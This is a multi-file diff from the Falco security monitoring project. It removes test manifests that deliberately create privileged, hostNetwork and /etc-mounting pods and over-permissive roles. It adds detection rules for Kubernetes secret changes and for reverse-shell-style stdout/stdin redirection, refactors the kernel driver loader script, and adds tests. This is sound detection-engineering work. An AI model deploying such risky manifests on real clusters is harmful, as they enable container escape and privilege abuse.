docker/event-generator/yaml/disallowed-pod-deployment.yaml

@@ -1,24 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: disallowed-pod-deployment
-  labels:
-    app.kubernetes.io/name: disallowed-pod-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Disallowed-Pod
-    message: Creating-pod-with-image-outside-of-allowed-images
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: disallowed-pod-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: disallowed-pod-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/hostnetwork-deployment.yaml

@@ -1,25 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: hostnetwork-deployment
-  labels:
-    app.kubernetes.io/name: hostnetwork-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-HostNetwork-Pod
-    message: Creating-deployment-with-hostNetwork-true-pod
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: hostnetwork-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: hostnetwork-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      hostNetwork: true
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/nodeport-service.yaml

@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: Service
-metadata:
-  name: nodeport-service
-  labels:
-    app.kubernetes.io/name: nodeport-service
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-NodePort-Service
-    message: Creating-service-of-type-NodePort
-spec:
-  type: NodePort
-  ports:
-    - port: 80
-  selector:
-    app: busybox

docker/event-generator/yaml/privileged-deployment.yaml

@@ -1,26 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: privileged-deployment
-  labels:
-    app.kubernetes.io/name: privileged-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Privileged-Pod
-    message: Creating-deployment-with-privileged-true-pod
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: privileged-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: privileged-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - securityContext:
-            privileged: true
-          name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/role-pod-exec.yaml

@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: pod-exec-role
-  labels:
-    app.kubernetes.io/name: pod-exec-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Pod-Exec-Created
-    message: Creating-role-that-can-exec-to-pods
-rules:
-- apiGroups:
-    - ""
-  resources:
-    - "pods/exec"
-  verbs:
-    - get

docker/event-generator/yaml/role-wildcard-resources.yaml

@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: wildcard-resources-role
-  labels:
-    app.kubernetes.io/name: wildcard-resources-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Write-Privileges-Created
-    message: Creating-role-with-wildcard-resources
-rules:
-- apiGroups:
-    - ""
-  resources:
-    - "*"
-  verbs:
-    - get

docker/event-generator/yaml/role-write-privileges.yaml

@@ -1,16 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: write-privileges-role
-  labels:
-    app.kubernetes.io/name: write-privileges-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: ClusterRole-With-Write-Privileges-Created
-    message: Creating-role-with-write-privileges
-rules:
-- apiGroups:
-    - ""
-  resources:
-    - "pods"
-  verbs:
-    - create

docker/event-generator/yaml/sensitive-mount-deployment.yaml

@@ -1,31 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: sensitive-mount-deployment
-  labels:
-    app.kubernetes.io/name: sensitive-mount-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: Create-Sensitive-Mount-Pod
-    message: Creating-deployment-with-pod-mounting-sensitive-path-from-host
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: sensitive-mount-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: sensitive-mount-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
-          volumeMounts:
-            - mountPath: /host/etc
-              name: etc
-      volumes:
-        - name: etc
-          hostPath:
-            path: /etc

docker/event-generator/yaml/vanilla-configmap.yaml

@@ -1,14 +0,0 @@
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: vanilla-configmap
-  labels:
-    app.kubernetes.io/name: vanilla-configmap
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-ConfigMap-Created
-    message: Creating-configmap
-data:
-  ui.properties: |
-    color.good=purple
-    color.bad=yellow
-    allow.textmode=true

docker/event-generator/yaml/vanilla-deployment.yaml

@@ -1,24 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: vanilla-deployment
-  labels:
-    app.kubernetes.io/name: vanilla-deployment
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Deployment-Created
-    message: Creating-deployment
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app.kubernetes.io/name: vanilla-busybox
-  template:
-    metadata:
-      labels:
-        app.kubernetes.io/name: vanilla-busybox
-        app.kubernetes.io/part-of: falco-event-generator
-    spec:
-      containers:
-        - name: busybox
-          image: busybox
-          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml

@@ -1,43 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: Role
-metadata:
-  name: vanilla-role
-  labels:
-    app.kubernetes.io/name: vanilla-role
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Role.Clusterrole-Created
-    message: Creating-role
-rules:
-- apiGroups:
-    - ""
-  resources:
-    - "pods"
-  verbs:
-    - list
----
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: vanilla-role-binding
-  labels:
-    app.kubernetes.io/name: vanilla-role-binding
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Role.Clusterrolebinding-Created
-    message: Creating-rolebinding
-roleRef:
-  kind: Role
-  name: vanilla-role
-  apiGroup: rbac.authorization.k8s.io
-subjects:
-  - kind: ServiceAccount
-    name: vanilla-service-account
----
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: vanilla-serviceaccount
-  labels:
-    app.kubernetes.io/name: vanilla-serviceaccount
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Serviceaccount-Created
-    message: Creating-serviceaccount

docker/event-generator/yaml/vanilla-service.yaml

@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: Service
-metadata:
-  name: vanilla-service
-  labels:
-    app.kubernetes.io/name: vanilla-service
-    app.kubernetes.io/part-of: falco-event-generator
-    falco.rules: K8s-Service-Created
-    message: Creating-service
-spec:
-  type: ClusterIP
-  ports:
-    - port: 80
-  selector:
-    app: busybox

examples/k8s_audit_config/audit-policy.yaml

@@ -56,11 +56,17 @@ rules:
     # The empty string "" can be used to select non-namespaced resources.
     namespaces: ["kube-system"]
 
-  # Log configmap and secret changes in all other namespaces at the RequestResponse level.
+  # Log configmap changes in all other namespaces at the RequestResponse level.
   - level: RequestResponse
     resources:
     - group: "" # core API group
-      resources: ["secrets", "configmaps"]
+      resources: ["configmaps"]
+
+  # Log secret changes in all other namespaces at the Metadata level.
+  - level: Metadata
+    resources:
+    - group: "" # core API group
+      resources: ["secrets"]
 
   # Log all other resources in core and extensions at the Request level.
   - level: Request

rules/falco_rules.yaml

@@ -2664,7 +2664,7 @@
   condition: (container.image.repository endswith "sysdig/agent" or container.image.repository endswith "falcosecurity/falco")
   append: false
 
-# The rule is disabled by default. 
+# The rule is disabled by default.
 # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
 - rule: Detect outbound connections to common miner pool ports
   desc: Miners typically connect to miner pools on common ports.
@@ -2685,10 +2685,10 @@
   items: [docker, kubectl, crictl]
 
 # Whitelist for known docker client binaries run inside container
-# - k8s.gcr.io/fluentd-gcp-scaler in GCP/GKE 
+# - k8s.gcr.io/fluentd-gcp-scaler in GCP/GKE
 - macro: user_known_k8s_client_container
   condition: (k8s.ns.name="kube-system" and container.image.repository=k8s.gcr.io/fluentd-gcp-scaler)
-  
+ 
 - rule: The docker client is executed in a container
   desc: Detect a k8s client tool executed inside a container
   condition: spawned_process and container and not user_known_k8s_client_container and proc.name in (k8s_client_binaries)
@@ -2712,7 +2712,7 @@
   output: Packet socket was created in a container (user=%user.name command=%proc.cmdline socket_info=%evt.args container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
   priority: NOTICE
   tags: [network, mitre_discovery]
-  
+ 
 # Change to (always_true) to enable rule 'Network connection outside local subnet'
 - macro: enabled_rule_network_only_subnet
   condition: (never_true)
@@ -2723,7 +2723,7 @@
 
 # Namespaces where the rule is enforce
 - list: namespace_scope_network_only_subnet
-  items: [] 
+  items: []
 
 - macro: network_local_subnet
   condition: >
@@ -2736,25 +2736,23 @@
 # # Add 'default' to namespace_scope_network_only_subnet
 # # Run:
 # kubectl run --generator=run-pod/v1 -n default -i --tty busybox --image=busybox --rm -- wget google.com -O /var/google.html
-# # Check logs running  
+# # Check logs running
 
 - rule: Network Connection outside Local Subnet
   desc: Detect traffic to image outside local subnet.
   condition: >
     enabled_rule_network_only_subnet and
-    inbound_outbound and 
+    inbound_outbound and
     container and
     not network_local_subnet and
     k8s.ns.name in (namespace_scope_network_only_subnet)
   output: >
     Network connection outside local subnet
-    (command=%proc.cmdline connection=%fd.name user=%user.name container_id=%container.id 
-    image=%container.image.repository namespace=%k8s.ns.name
-    fd.rip.name=%fd.rip.name fd.lip.name=%fd.lip.name fd.cip.name=%fd.cip.name fd.sip.name=%fd.sip.name)
+    (command=%proc.cmdline connection=%fd.name user=%user.name container_id=%container.id
+     image=%container.image.repository namespace=%k8s.ns.name
+     fd.rip.name=%fd.rip.name fd.lip.name=%fd.lip.name fd.cip.name=%fd.cip.name fd.sip.name=%fd.sip.name)
   priority: WARNING
   tags: [network]
-  
-
 
 - macro: allowed_port
   condition: (never_true)
@@ -2795,7 +2793,12 @@
   priority: WARNING
   tags: [network]
 
-
+- rule: Redirect STDOUT/STDIN to Network Connection in Container
+  desc: Detect redirecting stdout/stdin to network connection in container (potential reverse shell).
+  condition: evt.type=dup and evt.dir=> and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
+  output: >
+    Redirect stdout/stdin to network connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
+  priority: WARNING
 
 # Application rules have moved to application_rules.yaml. Please look
 # there if you want to enable them by adding to

rules/k8s_audit_rules.yaml

@@ -102,6 +102,9 @@
 - macro: role
   condition: ka.target.resource=roles
 
+- macro: secret
+  condition: ka.target.resource=secrets
+
 - macro: health_endpoint
   condition: ka.uri=/healthz
 
@@ -401,6 +404,22 @@
   source: k8s_audit
   tags: [k8s]
 
+- rule: K8s Secret Created
+  desc: Detect any attempt to create a secret. Service account tokens are excluded.
+  condition: (kactivity and kcreate and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
+  output: K8s Secret Created (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+  priority: INFO
+  source: k8s_audit
+  tags: [k8s]
+
+- rule: K8s Secret Deleted
+  desc: Detect any attempt to delete a secret Service account tokens are excluded.
+  condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
+  output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+  priority: INFO
+  source: k8s_audit
+  tags: [k8s]
+
 # This rule generally matches all events, and as a result is disabled
 # by default. If you wish to enable these events, modify the
 # following macro.

scripts/falco-driver-loader

@@ -66,7 +66,6 @@ cos_version_greater()
 	return 0
 }
 
-
 get_kernel_config() {
 	if [ -f /proc/config.gz ]; then
 		echo "Found kernel config at /proc/config.gz"
@@ -102,62 +101,100 @@ get_kernel_config() {
 	fi
 }
 
+get_target_id() {
+	if [ -f "${HOST_ROOT}/etc/os-release" ]; then
+		# freedesktop.org and systemd
+		# shellcheck source=/dev/null
+		source "${HOST_ROOT}/etc/os-release"
+		OS_ID=$ID
+	elif [ -f "${HOST_ROOT}/etc/debian_version" ]; then
+		# Older Debian
+		# fixme > can this happen on older Ubuntu?
+		OS_ID=debian
+	elif [ -f "${HOST_ROOT}/etc/centos-release" ]; then
+		# Older CentOS
+		OS_ID=centos
+	else
+		>&2 echo "Detected an unsupported target system, please get in touch with the Falco community"
+		exit 1
+	fi
+
+	case "${OS_ID}" in
+	("amzn")
+		if [[ $VERSION_ID == "2" ]]; then
+			TARGET_ID="amazonlinux2"
+		else
+			TARGET_ID="amazonlinux"
+		fi
+		;;
+	("ubuntu")
+		if [[ $KERNEL_RELEASE == *"aws"* ]]; then
+			TARGET_ID="ubuntu-aws"
+		else
+			TARGET_ID="ubuntu"
+		fi
+		;;
+	(*)
+		TARGET_ID=$(echo "${OS_ID}" | tr '[:upper:]' '[:lower:]')
+		;;
+	esac
+}
+
 load_kernel_module() {
 	if ! hash lsmod > /dev/null 2>&1; then
-		echo "This program requires lsmod"
+		>&2 echo "This program requires lsmod"
 		exit 1
 	fi
 
 	if ! hash modprobe > /dev/null 2>&1; then
-		echo "This program requires modprobe"
+		>&2 echo "This program requires modprobe"
 		exit 1
 	fi
 
 	if ! hash rmmod > /dev/null 2>&1; then
-		echo "This program requires rmmod"
+		>&2 echo "This program requires rmmod"
 		exit 1
 	fi
 
-	echo "* Unloading ${PROBE_NAME}, if present"
-	rmmod "${PROBE_NAME}" 2>/dev/null
+	echo "* Unloading ${DRIVER_NAME} module, if present"
+	rmmod "${DRIVER_NAME}" 2>/dev/null
 	WAIT_TIME=0
-	KMOD_NAME=$(echo "${PROBE_NAME}" | tr "-" "_")
+	KMOD_NAME=$(echo "${DRIVER_NAME}" | tr "-" "_")
 	while lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1 && [ $WAIT_TIME -lt "${MAX_RMMOD_WAIT}" ]; do
-		if rmmod "${PROBE_NAME}" 2>/dev/null; then
-			echo "* Unloading ${PROBE_NAME} succeeded after ${WAIT_TIME}s"
+		if rmmod "${DRIVER_NAME}" 2>/dev/null; then
+			echo "* Unloading ${DRIVER_NAME} module succeeded after ${WAIT_TIME}s"
 			break
 		fi
 		((++WAIT_TIME))
 		if (( WAIT_TIME % 5 == 0 )); then
-			echo "* ${PROBE_NAME} still loaded, waited ${WAIT_TIME}s (max wait ${MAX_RMMOD_WAIT}s)"
+			echo "* ${DRIVER_NAME} module still loaded, waited ${WAIT_TIME}s (max wait ${MAX_RMMOD_WAIT}s)"
 		fi
 		sleep 1
 	done
 
 	if lsmod | grep "${KMOD_NAME}" > /dev/null 2>&1; then
-		echo "* ${PROBE_NAME} seems to still be loaded, hoping the best"
+		echo "* ${DRIVER_NAME} module seems to still be loaded, hoping the best"
 		exit 0
 	fi
 
-	# skip dkms on UEK hosts because it will always fail
+	# skip dkms on UEK hosts because it will always fail`
 	if [[ $(uname -r) == *uek* ]]; then
 		echo "* Skipping dkms install for UEK host"
 	else
-		echo "* Running dkms install for ${PACKAGE_NAME}"
-		if dkms install -m "${PACKAGE_NAME}" -v "${DRIVER_VERSION}" -k "${KERNEL_RELEASE}"; then
-			echo "* Trying to load a dkms ${PROBE_NAME}, if present"
+		if hash dkms &>/dev/null && dkms install -m "${DRIVER_NAME}" -v "${DRIVER_VERSION}" -k "${KERNEL_RELEASE}" 2>/dev/null; then
+			echo "* Trying to load a dkms ${DRIVER_NAME} module, if present"
 
-			if insmod "/var/lib/dkms/${PACKAGE_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${PROBE_NAME}.ko" > /dev/null 2>&1; then
-				echo "${PROBE_NAME} found and loaded in dkms"
+			if insmod "/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${DRIVER_NAME}.ko" > /dev/null 2>&1; then
+				echo "${DRIVER_NAME} module found and loaded in dkms"
 				exit 0
-			elif insmod "/var/lib/dkms/${PACKAGE_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${PROBE_NAME}.ko.xz" > /dev/null 2>&1; then
-				echo "${PROBE_NAME} found and loaded in dkms (xz)"
+			elif insmod "/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/${KERNEL_RELEASE}/${ARCH}/module/${DRIVER_NAME}.ko.xz" > /dev/null 2>&1; then
+				echo "${DRIVER_NAME} module found and loaded in dkms (xz)"
 				exit 0
 			else
 				echo "* Unable to insmod"
 			fi
 		else
-			DKMS_LOG="/var/lib/dkms/${PACKAGE_NAME}/${DRIVER_VERSION}/build/make.log"
+			DKMS_LOG="/var/lib/dkms/${DRIVER_NAME}/${DRIVER_VERSION}/build/make.log"
 			if [ -f "${DKMS_LOG}" ]; then
 				echo "* Running dkms build failed, dumping ${DKMS_LOG}"
 				cat "${DKMS_LOG}"
@@ -167,35 +204,35 @@ load_kernel_module() {
 		fi
 	fi
 
-	echo "* Trying to load a system ${PROBE_NAME}, if present"
+	echo "* Trying to load a system ${DRIVER_NAME} driver, if present"
 
-	if modprobe "${PROBE_NAME}" > /dev/null 2>&1; then
-		echo "${PROBE_NAME} found and loaded with modprobe"
+	if modprobe "${DRIVER_NAME}" > /dev/null 2>&1; then
+		echo "${DRIVER_NAME} module found and loaded with modprobe"
 		exit 0
 	fi
 
-	echo "* Trying to find precompiled ${PROBE_NAME} for ${KERNEL_RELEASE}"
+	echo "* Trying to find a prebuilt ${DRIVER_NAME} module for kernel ${KERNEL_RELEASE}"
 
-	get_kernel_config
+	get_target_id
 
-	local FALCO_PROBE_FILENAME="${PROBE_NAME}-${DRIVER_VERSION}-${ARCH}-${KERNEL_RELEASE}-${HASH}.ko"
+	local FALCO_KERNEL_MODULE_FILENAME="${DRIVER_NAME}_${TARGET_ID}_${KERNEL_RELEASE}_${KERNEL_VERSION}.ko"
 
-	if [ -f "${HOME}/.falco/${FALCO_PROBE_FILENAME}" ]; then
-		echo "Found precompiled module at ~/.falco/${FALCO_PROBE_FILENAME}, loading module"
-		insmod "${HOME}/.falco/${FALCO_PROBE_FILENAME}"
+	if [ -f "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}" ]; then
+		echo "Found a prebuilt module at ${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}, loading it"
+		insmod "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}"
 		exit $?
 	fi
 
 	local URL
-	URL=$(echo "${PROBE_URL}/${PACKAGES_REPOSITORY}/sysdig-probe-binaries/${FALCO_PROBE_FILENAME}" | sed s/+/%2B/g)
+	URL=$(echo "${DRIVERS_REPO}/${DRIVER_VERSION}/${FALCO_KERNEL_MODULE_FILENAME}" | sed s/+/%2B/g)
 
-	echo "* Trying to download precompiled module from ${URL}"
-	if curl --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" -o "${HOME}/.falco/${FALCO_PROBE_FILENAME}" "${URL}"; then
+	echo "* Trying to download prebuilt module from ${URL}"
+	if curl -L --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" -o "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}" "${URL}"; then
 		echo "Download succeeded, loading module"
-		insmod "${HOME}/.falco/${FALCO_PROBE_FILENAME}"
+		insmod "${HOME}/.falco/${FALCO_KERNEL_MODULE_FILENAME}"
 		exit $?
 	else
-		echo "Download failed, consider compiling your own ${PROBE_NAME} and loading it or getting in touch with the Falco community"
+		>&2 echo "Download failed, consider compiling your own ${DRIVER_NAME} module and loading it or getting in touch with the Falco community"
 		exit 1
 	fi
 }
@@ -211,7 +248,7 @@ load_bpf_probe() {
 
 	if [ -n "${HOST_ROOT}" ] && [ -f "${HOST_ROOT}/etc/os-release" ]; then
 		# shellcheck source=/dev/null
-		. "${HOST_ROOT}/etc/os-release"
+		source "${HOST_ROOT}/etc/os-release"
 
 		if [ "${ID}" == "cos" ]; then
 			COS=1
@@ -223,7 +260,9 @@ load_bpf_probe() {
 		MINIKUBE_VERSION="$(cat "${HOST_ROOT}/etc/VERSION")"
 	fi
 
-	local BPF_PROBE_FILENAME="${BPF_PROBE_NAME}-${DRIVER_VERSION}-${ARCH}-${KERNEL_RELEASE}-${HASH}.o"
+	get_target_id
+
+	local BPF_PROBE_FILENAME="${DRIVER_NAME}_${TARGET_ID}_${KERNEL_RELEASE}_${KERNEL_VERSION}.o"
 
 	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
 
@@ -267,7 +306,7 @@ load_bpf_probe() {
 				if [[ greater_ret -eq 1 ]]; then
 				export KBUILD_EXTRA_CPPFLAGS=-DCOS_73_WORKAROUND
 				fi
-						}
+			}
 		fi
 
 		if [ -n "${MINIKUBE}" ]; then
@@ -301,7 +340,7 @@ load_bpf_probe() {
 			mkdir -p /tmp/kernel
 			cd /tmp/kernel || exit
 			cd "$(mktemp -d -p /tmp/kernel)" || exit
-			if ! curl -o kernel-sources.tgz --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" "${BPF_KERNEL_SOURCES_URL}"; then
+			if ! curl -L -o kernel-sources.tgz --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" "${BPF_KERNEL_SOURCES_URL}"; then
 				exit 1;
 			fi
 
@@ -323,12 +362,12 @@ load_bpf_probe() {
 			customize_kernel_build
 		fi
 
-		echo "* Trying to compile BPF probe ${BPF_PROBE_NAME} (${BPF_PROBE_FILENAME})"
+		echo "* Trying to compile the eBPF probe (${BPF_PROBE_FILENAME})"
 
-		make -C "/usr/src/${PACKAGE_NAME}-${DRIVER_VERSION}/bpf" > /dev/null
+		make -C "/usr/src/${DRIVER_NAME}-${DRIVER_VERSION}/bpf" > /dev/null
 
-		mkdir -p ~/.falco
-		mv "/usr/src/${PACKAGE_NAME}-${DRIVER_VERSION}/bpf/probe.o" "${HOME}/.falco/${BPF_PROBE_FILENAME}"
+		mkdir -p "${HOME}/.falco"
+		mv "/usr/src/${DRIVER_NAME}-${DRIVER_VERSION}/bpf/probe.o" "${HOME}/.falco/${BPF_PROBE_FILENAME}"
 
 		if [ -n "${BPF_KERNEL_SOURCES_URL}" ]; then
 			rm -r /tmp/kernel
@@ -337,42 +376,40 @@ load_bpf_probe() {
 
 	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
 		local URL
-		URL=$(echo "${PROBE_URL}/${PACKAGES_REPOSITORY}/sysdig-probe-binaries/${BPF_PROBE_FILENAME}" | sed s/+/%2B/g)
+		URL=$(echo "${DRIVERS_REPO}/${DRIVER_VERSION}/${BPF_PROBE_FILENAME}" | sed s/+/%2B/g)
 
-		echo "* Trying to download precompiled BPF probe from ${URL}"
+		echo "* Trying to download a prebuilt eBPF probe from ${URL}"
 
-		curl --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" -o "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${URL}"
+		curl -L --create-dirs "${FALCO_DRIVER_CURL_OPTIONS}" -o "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${URL}"
 	fi
 
 	if [ -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
 		if [ ! -f /proc/sys/net/core/bpf_jit_enable ]; then
-			echo "**********************************************************"
-			echo "** BPF doesn't have JIT enabled, performance might be   **"
-			echo "** degraded. Please ensure to run on a kernel with      **"
-			echo "** CONFIG_BPF_JIT enabled and/or use --net=host if      **"
-			echo "** running inside a container.                          **"
-			echo "**********************************************************"
+			echo "******************************************************************"
+			echo "** BPF doesn't have JIT enabled, performance might be degraded. **"
+			echo "** Please ensure to run on a kernel with CONFIG_BPF_JIT on.     **"
+			echo "******************************************************************"
 		fi
 
-		echo "* BPF probe located, it's now possible to start falco"
+		echo "* eBPF probe located, it's now possible to start Falco"
 
-		ln -sf "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${HOME}/.falco/${BPF_PROBE_NAME}.o"
+		ln -sf "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${HOME}/.falco/${DRIVER_NAME}-bpf.o"
 		exit $?
 	else
-		echo "* Failure to find a BPF probe"
+		echo "* Failure to find an eBPF probe"
 		exit 1
 	fi
 }
 
 ARCH=$(uname -m)
 KERNEL_RELEASE=$(uname -r)
-SCRIPT_NAME=$(basename "${0}")
-PROBE_URL=${PROBE_URL:-"@DRIVER_LOOKUP_URL@"}
-if [ -n "$PROBE_INSECURE_DOWNLOAD" ]
+KERNEL_VERSION=$(uname -v | sed 's/#\([[:digit:]]\+\).*/\1/')
+DRIVERS_REPO=${DRIVERS_REPO:-"@DRIVERS_REPO@"}
+if [ -n "$DRIVER_INSECURE_DOWNLOAD" ]
 then
-	FALCO_PROBE_CURL_OPTIONS=-fsSk
+	FALCO_DRIVER_CURL_OPTIONS=-fsSk
 else
-	FALCO_PROBE_CURL_OPTIONS=-fsS
+	FALCO_DRIVER_CURL_OPTIONS=-fsS
 fi
 
 MAX_RMMOD_WAIT=60
@@ -380,19 +417,8 @@ if [[ $# -ge 1 ]]; then
 	MAX_RMMOD_WAIT=$1
 fi
 
-if [ -z "${PACKAGES_REPOSITORY}" ]; then
-	PACKAGES_REPOSITORY="stable"
-fi
-
-if [ "${SCRIPT_NAME}" = "falco-driver-loader" ]; then
-	DRIVER_VERSION="@PROBE_VERSION@"
-	PROBE_NAME="@PROBE_NAME@"
-	BPF_PROBE_NAME="@PROBE_NAME@-bpf"
-	PACKAGE_NAME="@PACKAGE_NAME@"
-else
-	echo "This script must be called as falco-driver-loader"
-	exit 1
-fi
+DRIVER_VERSION="@PROBE_VERSION@"
+DRIVER_NAME="@PROBE_NAME@"
 
 if [ "$(id -u)" != 0 ]; then
 	echo "Installer must be run as root (or with sudo)."
@@ -408,4 +434,4 @@ if [ -v FALCO_BPF_PROBE ] || [ "${1}" = "bpf" ]; then
 	load_bpf_probe
 else
 	load_kernel_module
-fi
+fi

test/falco_k8s_audit_tests.yaml

@@ -576,3 +576,40 @@ trace_files: !mux
     detect_counts:
       - K8s Role/Clusterrolebinding Deleted: 1
     trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json
+
+  create_secret:
+    detect: True
+    detect_level: INFO
+    rules_file:
+      - ../rules/falco_rules.yaml
+      - ../rules/k8s_audit_rules.yaml
+    detect_counts:
+      - K8s Secret Created: 1
+    trace_file: trace_files/k8s_audit/create_secret.json
+
+  # Should *not* result in any event as the secret rules skip service account token secrets
+  create_service_account_token_secret:
+    detect: False
+    detect_level: INFO
+    rules_file:
+      - ../rules/falco_rules.yaml
+      - ../rules/k8s_audit_rules.yaml
+    trace_file: trace_files/k8s_audit/create_service_account_token_secret.json
+
+  create_kube_system_secret:
+    detect: False
+    detect_level: INFO
+    rules_file:
+      - ../rules/falco_rules.yaml
+      - ../rules/k8s_audit_rules.yaml
+    trace_file: trace_files/k8s_audit/create_kube_system_secret.json
+
+  delete_secret:
+    detect: True
+    detect_level: INFO
+    rules_file:
+      - ../rules/falco_rules.yaml
+      - ../rules/k8s_audit_rules.yaml
+    detect_counts:
+      - K8s Secret Deleted: 1
+    trace_file: trace_files/k8s_audit/delete_secret.json

test/trace_files/k8s_audit/create_kube_system_secret.json

@@ -0,0 +1 @@
+{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"263db4e4-f0bb-41b4-913d-c03815f49be5","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/kube-system/secrets","verb":"create","user":{"username":"admin","groups":["system:masters","system:authenticated"]},"sourceIPs":["127.0.0.1"],"userAgent":"kubeadm/v1.16.2 (linux/amd64) kubernetes/c97fe50","objectRef":{"resource":"secrets","namespace":"kube-system","name":"bootstrap-token-ne7bxu","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-03-24T18:53:49.023018Z","stageTimestamp":"2020-03-24T18:53:49.025530Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}

test/trace_files/k8s_audit/create_secret.json

@@ -0,0 +1,2 @@
